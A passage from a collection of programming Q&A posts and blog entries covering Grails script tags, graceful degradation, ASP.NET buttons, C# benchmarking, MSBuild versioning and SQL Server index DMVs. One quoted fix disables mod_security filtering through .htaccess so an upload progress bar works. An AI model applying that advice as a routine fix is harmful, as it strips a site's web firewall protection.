        <g:javascript library="myscript" />
        <g:javascript library="myscript" />
        <g:javascript library="myscript" />

    it will output:

        <script type="text/javascript" src="/vip/js/myscript.js"></script>
        <script type="text/javascript" src="/vip/js/myscript.js"></script>
        <script type="text/javascript" src="/vip/js/myscript.js"></script>
        <!-- other try -->
        <script type="text/javascript" src="/vip/js/myscript.js"></script>

    Conclusion: with library, it will be included only once. I have been trying to find documentation about this without success. Do you have any pointers?


  • Who will take benefit of graceful degradation? Desktop users, mobile users, screen reader users?

    - by metal-gear-solid
    What percentage of users are on desktop? What percentage are on mobile, iPad, or iPhone? And are there any other devices used to access websites that do not support JavaScript? Is JavaScript also a problem for screen-reader users? Who benefits if we make things work without JavaScript, or provide a non-JavaScript version? Who benefits from graceful degradation: desktop users, mobile users, screen-reader users? Is it worth giving time to graceful degradation? Does WCAG 2.0 prefer that JavaScript not be used? Why would anyone want to surf the net without JavaScript?


  • turn off / disable the performance cache

    - by jessie
    OK, I run a streaming website, and my CMS is giving me the error "Failed To Find Flength File" when uploading videos, so I did some research. The answer I got from the coder is below. I did all of that, but the one thing I could not do is turn off what he refers to as the performance cache, discussed in the last paragraph. I am on CentOS.

    "Assuming the script is set up properly, you are probably dealing with some kind of write-caching. Some servers perform write-caching, which prevents writing out the flength file or the entire CGITemp file during the upload. The flength file or the CGITemp file does not actually hit the disk until the upload is complete, making it worthless for reporting progress during the upload. This may be fixed using a .htaccess file, assuming your host supports them. Here is a link to an excellent tutorial on using .htaccess files; I strongly recommend giving it a quick read before attempting to install your own .htaccess file.

    1. A mod_security module for Apache. To fix it, just create a file called .htaccess (that's a period followed by "htaccess") and put the following lines in that file. Upload the file into the directory where the Uber-Uploader CGI ".pl" scripts reside, or some directory above it (like your server's DOCUMENT_ROOT, i.e. the top level of your webspace). htaccess files must be uploaded as ASCII mode, not BINARY. You may need to CHMOD the htaccess file to 644 (RW-R--R--).

        # Turn off mod_security filtering.
        SecFilterEngine Off
        # The below probably isn't needed,
        # but better safe than sorry.
        SecFilterScanPOST Off

    If the above method does not work, try putting the following lines into the file instead:

        SetEnvIfNoCase Content-Type \
        "^multipart/form-data;" "MODSEC_NOPOSTBUFFERING=Do not buffer file uploads"
        mod_gzip_on No

    2. "Performance Cache" enabled on OS X Server. If you're running OS X Server and the progress bar isn't working, it could be because of "performance caching". Apparently, if ANY of your hosted sites are using performance caching, then by default all sites (domains) will attempt to. The fix, then, is to disable the performance cache on all hosted sites."


  • Disabled asp button

    - by Geoorg
    Hi, I have an ASP.NET button like this:

        <asp:Button ID="ImportToDB" runat="server" OnClick="ImportToDB_Click" />

    and I need to call a javascript function on mouseover of this button. So I have in Page_Load():

        ImportToDB.Attributes.Add("onmouseover", "javascript:OnButtonMove(" + ImportToDB.ClientID + ")");

    and the javascript function:

        <script language="JavaScript" type="text/javascript">
            function OnButtonMove(id) {
                //something
            }
        </script>

    Everything works fine, but only while the button is enabled; when I disable the button, the javascript function never fires. What I am trying to do: I have a button, and when something is wrong I just disable it, and when the user mouses over this (disabled) button, I show him a DIV with a message. Can someone tell me why I cannot call this JS function while the button is disabled?
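
    The likely cause: a disabled input swallows mouse events in the browser, so no handler attached to the button itself will fire while it is disabled. A common workaround is to attach the handler to an enabled wrapper element around the button instead; a sketch (the Panel name is illustrative, and note the quotes around the ClientID so it is passed as a string):

        // markup: the wrapper never gets disabled, only the button does
        // <asp:Panel ID="ImportWrapper" runat="server" style="display:inline-block">
        //     <asp:Button ID="ImportToDB" runat="server" OnClick="ImportToDB_Click" />
        // </asp:Panel>

        protected void Page_Load(object sender, EventArgs e)
        {
            // mouseover keeps firing on the wrapper even when the inner button
            // is disabled, so the message DIV can still be shown
            ImportWrapper.Attributes.Add("onmouseover",
                "OnButtonMove('" + ImportToDB.ClientID + "')");
        }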


  • why my test performance class gives me inconsistent results even after proper warm-up?

    - by colinfang
    I made a class which helps me measure time, in ticks, for any method. Basically, it runs the testing method 100x and forces a GC, then it records the time taken for another 100x method runs. x64, Release, Ctrl+F5, VS2012/VS2010. The results are the following (reflowed here, 10 per row):

        2,914 2,909 2,913 2,909 2,908 2,907 2,909 2,998 2,976 2,855
        2,446 2,415 2,435 2,401 2,402 2,402 2,399 2,401 2,401 2,400
        2,399 2,400 2,404 2,402 2,401 2,399 2,400 2,402 2,404 2,403
        2,401 2,403 2,401 2,400 2,399 2,414 2,405 2,401 2,407 2,399
        2,401 2,402 2,401 2,404 2,401 2,404 2,405 2,368 1,577 1,579
        1,626 1,578 1,576 1,578 1,577 1,577 1,576 1,578 1,576 1,578
        1,577 1,578 1,576 1,578 1,577 1,579 1,585 1,576 1,579 1,577
        1,579 1,578 1,579 1,577 1,578 1,577 1,578 1,576 1,578 1,577
        1,578 1,599 1,579 1,578 1,582 1,576 1,578 1,576 1,579 1,577
        1,578 1,577 1,591 1,577 1,578 1,578 1,576 1,578 1,576 1,578

    As you can see, there are 3 phases: the first is ~2,900, the second is ~2,400, then ~1,550. What might be the reason for this? The test performance class code follows:

        public static void RunTests(Func<long> myTest)
        {
            const int numTrials = 100;
            Stopwatch sw = new Stopwatch();
            double[] sample = new double[numTrials];
            Console.WriteLine("Checksum is {0:N0}", myTest());

            sw.Start();
            myTest();
            sw.Stop();
            Console.WriteLine("Estimated time per test is {0:N0} ticks\n", sw.ElapsedTicks);

            for (int i = 0; i < numTrials; i++)
            {
                myTest();
            }
            GC.Collect();

            string testName = myTest.Method.Name;
            Console.WriteLine("----> Starting benchmark {0}\n", myTest.Method.Name);
            for (int i = 0; i < numTrials; i++)
            {
                sw.Restart();
                myTest();
                sw.Stop();
                sample[i] = sw.ElapsedTicks;
            }

            double testResult = DataSetAnalysis.Report(sample);
            for (int j = 0; j < numTrials; j = j + 5)
                Console.WriteLine("{0,8:N0} {1,8:N0} {2,8:N0} {3,8:N0} {4,8:N0}",
                    sample[j], sample[j + 1], sample[j + 2], sample[j + 3], sample[j + 4]);

            Console.WriteLine("\n----> End of benchmark");
        }
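
    Stepped timings like these usually come from the environment rather than the method under test: JIT compilation, CPU frequency scaling and Turbo Boost, core migration, or a GC kicking in mid-run. A few hedged additions that tend to flatten the phases (a sketch; adjust to taste):

        using System;
        using System.Diagnostics;
        using System.Threading;

        static class Stabilize
        {
            public static void BeforeBenchmark()
            {
                // Reduce the chance the OS preempts or migrates the test thread.
                Process.GetCurrentProcess().PriorityClass = ProcessPriorityClass.High;
                Thread.CurrentThread.Priority = ThreadPriority.Highest;

                // Start from a clean heap so a collection doesn't land mid-phase.
                GC.Collect();
                GC.WaitForPendingFinalizers();
                GC.Collect();
            }
        }

    Even with this, wall-clock phases from CPU frequency scaling can only be ruled out by pinning the clock in the BIOS/power plan, which is one reason purpose-built harnesses measure for a minimum duration per trial rather than a fixed trial count.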


  • Web Site Performance and Assembly Versioning – Part 2 Versioning Combined Files Using Subversion

    - by capgpilk
    OK, so it took a while to post this second part; many apologies, we had a big roll-out of a new platform at work and many things had to get sidelined. This is the second part in a short series on website performance and using versioning to help improve it:

    1. Minification and concatenation of JavaScript and CSS files
    2. Versioning combined files using Subversion - this post
    3. Versioning combined files using Mercurial - published shortly

    In the previous post we used AjaxMin to shrink js and css files, then concatenated them into one file each, named site-script.combined.min.js and site-style.combined.min.css. These file names are fine, but you can configure IIS 7 to cache these static files and so lower the amount of data transferred between server and client. This is done by editing the response headers in IIS:

    1. In IIS 7 Manager, choose the directory where these files are located and select HTTP Response Headers.
    2. Check Expire Web Content and set a time period well into the future.
    3. When refreshing the web page, the server will respond with HTTP 304, forcing the browser to retrieve the file from its cache.
    4. As can be seen in FireBug, the Cache-Control header has a max-age of 31536000 seconds, which equates to 365 days.

    The server will always send this HTTP 304 response unless the file changes, forcing it to send new content. So we have lowered data transfer for content that hasn't changed, but need it to be re-sent when you have made a change to the css or js files; to help force this, we can change the file name on each build using the SVN revision number. Now to get the SVN revision number into the file name:

    1. Import the MSBuildCommunityTasks targets, which can be downloaded from here.

        <Import Project="$(MSBuildExtensionsPath)\MSBuildCommunityTasks\MSBuild.Community.Tasks.Targets" />

    2. Edit the BeforeBuild target to call out to svn and get the latest revision.

        <SvnVersion LocalPath="$(MSBuildProjectDirectory)"
                    ToolPath="$(ProgramFiles)\VisualSVN Server\bin">
            <Output TaskParameter="Revision" PropertyName="Revision" />
        </SvnVersion>

    3. Set it to update the project AssemblyInfo.cs file with the svn revision.

        <FileUpdate Files="Properties\AssemblyInfo.cs"
                    Regex="(\d+)\.(\d+)\.(\d+)\.(\d+)"
                    ReplacementText="$1.$2.$3.$(Revision)" />

    4. Now edit the AfterBuild target to get the full dll version. You could combine these two steps and just get the version from svn; I am working on one project that updates the AssemblyInfo file and another project that allows manual editing of the file but needs that version within the file name, so I just combined the two for this post.

        <MSBuild.ExtensionPack.Framework.Assembly TaskAction="GetInfo"
                                                  NetAssembly="$(OutputPath)\mydll.dll">
            <Output TaskParameter="OutputItems" ItemName="Info" />
        </MSBuild.ExtensionPack.Framework.Assembly>
        <Message Text="Version: %(Info.AssemblyVersion)" Importance="High" />

    5. Use this Info.AssemblyVersion to write out the combined css and js files as described in the last post.

        <WriteLinesToFile File="Scripts\site-%(Info.AssemblyVersion).combined.min.js"
                          Lines="@(JSLinesSite)" Overwrite="true" />

    In the next post I will cover doing the same, but for a Mercurial repository.


  • quick look at: dm_db_index_physical_stats

    - by fatherjack
    A quick look at the key data from this dmv that can help a DBA keep databases performing well and systems online as the users need them.

    When the dynamic management views relating to index statistics became available in SQL Server 2005, there was much hype about how they could help a DBA keep their servers running in better health than ever before. This particular view gives an insight into the physical health of the indexes present in a database. Whether they are used or unused, complete or missing some columns is irrelevant; these are simply the physical stats of all indexes (disabled indexes are ignored, however). In its simplest form this dmv can be executed with all five parameters set to NULL.

    The results from executing it that way contain a record for every index in every database, but some of the columns will be NULL. The first parameter is there so that you can specify which database you want to gather index details on, rather than scanning every database; simply specifying DB_ID() in place of the first NULL achieves this. In order to avoid the NULLs - or, more accurately, in order to choose when to have the NULLs - you need to specify a value for the last parameter. It takes one of four values: DEFAULT, 'SAMPLED', 'LIMITED' or 'DETAILED'. If you execute the dmv with each of these values, you can see some interesting differences in the times taken to complete each step.

        DECLARE @Start DATETIME
        DECLARE @First DATETIME
        DECLARE @Second DATETIME
        DECLARE @Third DATETIME
        DECLARE @Finish DATETIME

        SET @Start = GETDATE()
        SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, DEFAULT) AS ddips
        SET @First = GETDATE()
        SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, 'SAMPLED') AS ddips
        SET @Second = GETDATE()
        SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, 'LIMITED') AS ddips
        SET @Third = GETDATE()
        SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, 'DETAILED') AS ddips
        SET @Finish = GETDATE()

        SELECT DATEDIFF(ms, @Start, @First) AS [DEFAULT]
             , DATEDIFF(ms, @First, @Second) AS [SAMPLED]
             , DATEDIFF(ms, @Second, @Third) AS [LIMITED]
             , DATEDIFF(ms, @Third, @Finish) AS [DETAILED]

    Running this code will give you four result sets:

    - DEFAULT will have 12 columns full of data and then NULLs in the remainder.
    - SAMPLED will have 21 columns full of data.
    - LIMITED will have 12 columns of data and NULLs in the remainder.
    - DETAILED will have 21 columns full of data.

    So, from this we can deduce that the DEFAULT value (the same one that is applied when you query the view using a NULL parameter) is the same as using LIMITED. Viewing the final result set shows some details worth noting: running queries against this view takes significantly longer when using the SAMPLED and DETAILED values in the last parameter, and the duration of the query is directly related to the size of the database you are working in, so be careful running this on big databases unless you have tried it on a test server first.

    Let's look at the data we get back with the DEFAULT value first of all, and then progress to the extra information later. We know that the first parameter we supply has to be a database id, and for the purposes of this blog we will be providing that value with the DB_ID function. We could just as easily put a fixed value in there, or a function such as DB_ID('AnyDatabaseName'). The first columns we get back are database_id and object_id. These are pretty self-explanatory, and we can wrap them in some code to make things a little easier to read:

        SELECT DB_NAME([ddips].[database_id]) AS [DatabaseName]
             , OBJECT_NAME([ddips].[object_id]) AS [TableName]
             ...
        FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, NULL) AS ddips

    which, joined to sys.indexes for the index name, gives us

        SELECT DB_NAME([ddips].[database_id]) AS [DatabaseName]
             , OBJECT_NAME([ddips].[object_id]) AS [TableName]
             , [i].[name] AS [IndexName]
             , ...
        FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, NULL) AS ddips
        INNER JOIN [sys].[indexes] AS i
            ON [ddips].[index_id] = [i].[index_id]
           AND [ddips].[object_id] = [i].[object_id]

    These handily tie in with the next parameters in the query on the dmv. If you specify an object_id and an index_id in these, then you get results limited to either the table or the specific index. Once again we can place a function in here to make it easier to work with a specific table, e.g.

        SELECT *
        FROM [sys].[dm_db_index_physical_stats](DB_ID(), OBJECT_ID('AdventureWorks2008.Person.Address'), 1, NULL, NULL) AS ddips

    Note: despite me showing that functions can be placed directly in the parameters for this dmv, best practice recommends that functions are not used directly in the function, as it is possible that they will fail to return a valid object ID. To be certain of not passing invalid values to this function, and therefore setting an automated process off on the wrong path, declare variables for the OBJECT_IDs and, once they have been validated, use them in the function:

        DECLARE @db_id SMALLINT;
        DECLARE @object_id INT;
        SET @db_id = DB_ID(N'AdventureWorks_2008');
        SET @object_id = OBJECT_ID(N'AdventureWorks_2008.Person.Address');
        IF @db_id IS NULL
        BEGIN
            PRINT N'Invalid database';
        END
        ELSE IF @object_id IS NULL
        BEGIN
            PRINT N'Invalid object';
        END
        ELSE
        BEGIN
            SELECT * FROM sys.dm_db_index_physical_stats(@db_id, @object_id, NULL, NULL, 'LIMITED');
        END;
        GO

    In cases where the results of querying this dmv don't have any effect on other processes (i.e. simply viewing the results in the SSMS results area), it will be noticed when the results are not consistent with the expected results, and in the case of this blog this is the method I have used.

    So, now that we can relate the values in these columns to something that we recognise in the database, let's see what those other values in the dmv are all about. We'll skip partition_number, index_type_desc, alloc_unit_type_desc, index_depth and index_level, as this is a quick look at the dmv and they are pretty self-explanatory. The final columns revealed by querying this view in DEFAULT mode are:

    - avg_fragmentation_in_percent: the amount that the index is logically fragmented. It will show NULL when the dmv is queried in SAMPLED mode.
    - fragment_count: the number of pieces that the index is broken into. It will show NULL when the dmv is queried in SAMPLED mode.
    - avg_fragment_size_in_pages: the average size, in pages, of a single fragment in the leaf level of the IN_ROW_DATA allocation unit. It will show NULL when the dmv is queried in SAMPLED mode.
    - page_count: total number of index or data pages in use.

    OK, so what does this give us? Well, there is an obvious correlation between fragment_count, page_count and avg_fragment_size_in_pages: we see that an index that takes up 27 pages and is in 3 fragments has an average fragment size of 9 pages (27/3=9). This means that for this index there are 3 separate places on the hard disk that SQL Server needs to locate and access to gather the data when it is requested by a DML query. If this index was bigger than 72KB, then having its data in 3 pieces might not be too big an issue, as each piece would hold a significant amount of data and the speed of access would not be too poor. If the number of fragments increases, then obviously the amount of data in each piece decreases, which means the amount of work the disks have to do to retrieve the data and satisfy the query increases, and performance starts to drop.

    This information can be useful to keep in mind when considering the value in the avg_fragmentation_in_percent column. This is arrived at by an internal algorithm that assigns a value to the logical fragmentation of the index, taking into account multiple files, the type of allocation unit, and the previously mentioned characteristics of index size (page_count) and fragment_count. Seeing an index with a high avg_fragmentation_in_percent value will be a call to action for a DBA who is investigating performance issues. It is possible that tables will have indexes that suffer rapid increases in fragmentation as part of normal daily business and therefore need regular defragmentation work to keep them in good order; in other cases indexes will rarely become fragmented and not need rebuilding from one end of the year to the other. Keeping this in mind, DBAs need an 'intelligent' process that assesses the key characteristics of an index and decides on the best defragmentation method to apply, if any. There is a simple example of this in the sample code found in the Books Online content for this dmv, in example D. There are also a couple of very popular solutions created by SQL Server MVPs Michelle Ufford and Ola Hallengren, which I would wholly recommend you review for much further detail on how to care for your SQL Server indexes.

    Right, let's get back on track. Querying the dmv with the fifth parameter set to 'DETAILED' takes longer because it goes through the index and refreshes all data from every level of the index. As this blog is only a quick look, we are going to skate right past ghost_record_count and version_ghost_record_count and discuss avg_page_space_used_in_percent, record_count, min_record_size_in_bytes, max_record_size_in_bytes and avg_record_size_in_bytes. There is a correlation between several of these columns: page_count is the number of 8KB pages used by the index, avg_page_space_used_in_percent is how full each page is (how much of the 8KB has actual data written on it), record_count is how many records are recorded in the index, and avg_record_size_in_bytes is the average size of each record. This approximates to: ((page_count * 8 * 1024) * (avg_page_space_used_in_percent / 100)) / record_count = avg_record_size_in_bytes*.

    avg_page_space_used_in_percent is an important column to review, as it indicates how much of the disk that has been given over to the storage of the index actually has data on it. This value is affected by the FILL_FACTOR parameter given when creating an index. avg_record_size_in_bytes is important because you can use it to get an idea of how many records fit in each page, and therefore in each fragment, thus reinforcing how important it is to keep fragmentation under control. min_record_size_in_bytes and max_record_size_in_bytes are exactly what their names suggest: details of the smallest and largest records in the index, offered purely as a guide for the DBA to better understand the storage practices taking place.

    So, keeping an eye on avg_fragmentation_in_percent will ensure that your indexes are helping data-access processes take place as efficiently as possible. Where fragmentation recurs frequently, the DBA should potentially consider:

    - the fill_factor of the index, in order to leave space at the leaf level so that new records can be inserted without causing fragmentation so rapidly;
    - the columns used in the index, analysed to avoid new records needing to be inserted in the middle of the index, so that they can always be added at the end.

    * - it's approximate because there are many factors, such as the type of data and other database settings, that affect this slightly.

    Another great resource for working with SQL Server DMVs is Performance Tuning with SQL Server Dynamic Management Views by Louis Davidson and Tim Ford - a free ebook or paperback from Simple Talk.

    Disclaimer - Jonathan is a Friend of Red Gate and as such, whenever they are discussed, will have a generally positive disposition towards Red Gate tools. Other tools are often available and you should always try others before you come back and buy the Red Gate ones. All code in this blog is provided "as is" and no guarantee, warranty or accuracy is applicable or inferred. Run the code on a test server and be sure to understand it before you run it on a server that means a lot to you or your manager.


  • SQL SERVER – SQL Server Misconceptions and Resolution – A Practical Perspective – TechEd 2012 India

    - by pinaldave
    TechEd India 2012 is just around the corner, and I will be presenting there in two different sessions. On the very first day of the event, my presentation will be all about SQL Server Misconceptions and Resolution - A Practical Perspective. The dictionary tells us that a "misconception" is a view or opinion that is incorrect, based on faulty thinking or understanding. In SQL Server there are so many misconceptions; in fact, when I hear some of them, I feel like fainting at that very moment! Seriously: at one time I came across a scenario where, instead of using INSERT INTO...SELECT, the developer used a CURSOR, believing that the cursor was faster (duh!). Here is the link to the blog post related to this.

    Pinal and Vinod in 2009

    I have been presenting at TechEd India for the last three years; this is my fourth opportunity to present a technical session on SQL Server. Just like in previous years, I decided to present something different. Here is the novelty this year: I will be presenting this session with Vinod Kumar. Vinod Kumar and I have great synergy when we work together. So far, we have written one SQL Server Interview Questions and Answers book and two video courses: (1) SQL Server Questions and Answers and (2) SQL Server Performance: Indexing Basics.

    Pinal and Vinod in 2011

    When we sat together and started building an outline for this course, we had many options in mind for this tango session. However, we have decided to make the session as lively as possible while keeping it natural at the same time. We know our flow and our conversation highlights, but we do not know exactly what each of us is going to present. We have decided to challenge each other on stage and push each other's knowledge to the verge. We promise that the session will be entertaining, with lots of SQL Server trivia, tips and tricks. Here are the challenges I'll take on:

    - I will puzzle Vinod with my difficult questions.
    - I will present a misconception that Vinod will have no resolution for.

    I need your help. Will you help me stump Vinod? If yes, come and attend our session and join me to prove that together we are superior (a friendly brain clash, but we must win!). SQL Server enthusiasts and fans are going to have a gala time at #TechEdIn, as we have a very solid lineup of speakers and extremely interesting sessions at TechEdIn. Read the complete blog post by Vinod.

    Session details -

    Title: SQL Server Misconceptions and Resolution - A Practical Perspective (Add to Calendar)

    Abstract: "The Earth is flat!" - an ancient common misconception, which has been proven incorrect as we progressed into modern times. In this session we will see various prevailing database misconceptions and their resolution with the aid of demos. In this unique session the audience will be part of the conversation and resolution.

    Date and time: March 21, 2012, 15:15 to 16:15

    Location: Hotel Lalit Ashok - Kumara Krupa High Grounds, Bengaluru - 560001, Karnataka, India.

    Please submit your questions in the comments area and I will for sure be discussing them during my session. If I pick your question to discuss during my session, here is your gift, which I commit to right now: the SQL Server Interview Questions and Answers book.

    Reference: Pinal Dave (http://blog.sqlauthority.com)

